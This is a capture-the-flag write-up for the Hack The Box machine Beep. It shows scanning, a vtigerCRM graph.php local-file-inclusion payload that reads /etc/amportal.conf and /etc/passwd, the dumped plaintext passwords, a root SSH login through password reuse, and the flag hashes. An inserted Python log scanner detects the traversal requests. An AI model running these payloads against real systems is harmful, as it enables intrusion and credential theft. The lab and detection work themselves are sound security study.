Beep
Platform: Hack The Box
IP Address: 10.10.10.7
Difficulty: Easy Linux
Beep has a very large list of running services, which can make it a bit challenging to find the correct entry method. This machine can be overwhelming for some as there are many potential attack vectors. Luckily, there are several methods available for gaining access.
nmap -p- 10.10.10.7 --min-rate 10000
nmap 10.10.10.7 -sCV -oN nmapscan
http://10.10.10.7 initially failed → forced TLS 1.0 allowed the page to load (Elastix login).
dirsearch -u http://beep.htb
/mailman/listinfo → exposed Mailman group mismatch.
Found public exploit: https://www.exploit-db.com/exploits/37637 → LFI via vtigerCRM graph.php
Tested:
https://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
✅ Dumped /etc/amportal.conf → DB creds + manager creds:
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
Then verified wider LFI:
https://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action
✅ Dumped /etc/passwd → confirmed users:
asterisk
fanis
root
ssh -oHostKeyAlgorithms=+ssh-rsa -oKexAlgorithms=+diffie-hellman-group14-sha1 root@beep.htb
✅ Root password was reused: jEhdIekWmdjE
[root@beep ~]# cat root.txt
083a385faea1a955f2550020bfd4ccc0
User flag:
[root@beep ~]# cat /home/fanis/user.txt
3196a67aeb4ad47494efdff2a8fe1aed
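A defender-side check for the graph.php requests shown above, added here as an example and not part of the original writeup: it scans web access-log lines for path traversal sequences or null bytes in the current_language parameter. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (combined log format); not captured from the target.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts&action HTTP/1.1" 200 512
192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 9120
192.0.2.66 - - [01/Jan/2024:10:00:09 +0000] "GET /vtigercrm/graph.php?current_language=%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&module=Accounts&action HTTP/1.1" 200 1741
192.0.2.11 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?lang=en HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encodings are normalised before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def findings(log_text, param="current_language"):
    """Return (client, status, decoded value, reasons) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        for key, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if key != param:
                continue
            value = fully_decode(raw)
            reasons = []
            if TRAVERSAL_RE.search(value):
                reasons.append("path traversal")
            if "\x00" in value:
                reasons.append("null byte")
            if reasons:
                hits.append((client, int(status), value, reasons))
    return hits

if __name__ == "__main__":
    for hit in findings(SAMPLE_LOG):
        print(hit)
```

A hit with a 200 status on this endpoint means every secret in the file that was read, and any account sharing that password, should be rotated.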
ssh -oHostKeyAlgorithms=+ssh-rsa -oKexAlgorithms=+diffie-hellman-group14-sha1 user@target
Writeup by inksec
GitHub: https://github.com/inkedqt
- Beep: Nmap → LFI in vtigerCRM → /etc/amportal.conf loot → SSH legacy algorithms → Root via re-used password